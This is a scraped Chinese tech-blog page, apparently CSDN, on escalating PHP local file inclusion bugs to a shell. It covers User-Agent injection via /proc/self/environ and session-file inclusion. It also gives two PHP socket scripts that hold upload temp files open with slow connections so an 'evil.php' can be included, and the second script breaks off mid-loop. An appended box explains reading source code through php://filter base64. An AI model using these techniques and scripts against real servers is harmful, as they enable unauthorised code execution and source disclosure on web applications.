php lfi /proc/self/environ,PHP安全之LFI漏洞GetShell方法大阅兵

然后通过这个插件修改user-agent,如图03:

84e022f8f8db20d8345b6128dfde8069.png

先选择上图的Edit User Agents 然后按照你如图04设置:

67c6e3c2b60a844d9cefe0829ae49308.png

完成后,访问/proc/self/environ即可。就可以得到shell了。这种方法从个人实践上来说相当的鸡肋。

方法二:自己用php写一个socket程序,发送http数据的时候记得修改user-agent选项为你的代码即可,具体的代码和上面第2种方法类似,留给大家去发挥了。

5.包含session文件

这个方法来自于k4shifz博客

php保存格式 sess_SESSIONID  默认位置是/tmp/和c:/windows/temp/ 。

关于最后一种比较麻烦,也够鸡肋。大家不要想当然,认为tmp和move_uploaded_file()有关,其实没有move_uploaded_file()函数时,php会自动、马上清除tmp文件,而让它保留在服务器的方法是 慢连接 。测试包含temp文件所用两脚本,这个方法唯一好处就是向任意php文件发包,php总会先在服务器上生成tmp文件,然后慢连接使它不被删除

(前提是php.ini file_uploads = On,5.3.1中增加了max_file_uploads,默认最大一次上传20个):

/* 这个所用时间较少 , 会产生20个临时文件 */

set_time_limit(0);

$cmd = 'Content-Disposition: form-data; name="evil"; filename="evil.php"

Content-Type: zzz

--k4shifz_boundary

';

$fs=fsockopen('localhost',80);

/* you can also use HTTP/1.1 */

fputs($fs,'POST /test.php HTTP/1.0

Content-Type: multipart/form-data; boundary=k4shifz_boundary

Host: localhost

Content-Length: 999999

--k4shifz_boundary

'.$cmd);

while($fs)

{

fputs($fs,$cmd);

sleep(1);

}

fclose($fs);

exit;

?>

/* 所用时间较长,会产生1个临时文件 */

set_time_limit(0);

$fs=fsockopen('localhost',80);

fputs($fs,'POST /test.php HTTP/1.0

Content-Type: multipart/form-data; boundary=k4shifz_boundary

Host: localhost

Content-Length: 999999

--k4shifz_boundary

Content-Disposition: form-data; name="evil"; filename="evil.php"

Content-Type: zzz

--k4shifz_boundary--

');

while($fs)

{

fputs($fs,'AAAA');

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
引用和提到了使用php://filter/read=convert.base64-encode/resource=来访问数据流并将其转换为base64编码。这个功能可以在一些特殊场景下使用,比如在文件包含漏洞或路径遍历漏洞中,通过构造恶意的URL参数来读取服务器上的文件内容。 在引用中的示例中,我们可以看到通过构造URL参数php://filter/read=convert.base64-encode/resource=../sqli/db.php来读取sqli目录下的db.php文件内容,并且将其以base64编码的形式返回。 因此,php://filter/read=convert.base64-encode/resource=可以用于读取服务器上的文件内容,并将其转换为base64编码后返回。这在一些特定的场景中可能是有用的,比如进行文件包含漏洞的利用或进行路径遍历漏洞的探测。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [PHP伪协议filter详解,php://filter协议过滤器](https://blog.csdn.net/wangyuxiang946/article/details/131149171)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码](https://blog.csdn.net/weixin_32446485/article/details/115546564)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值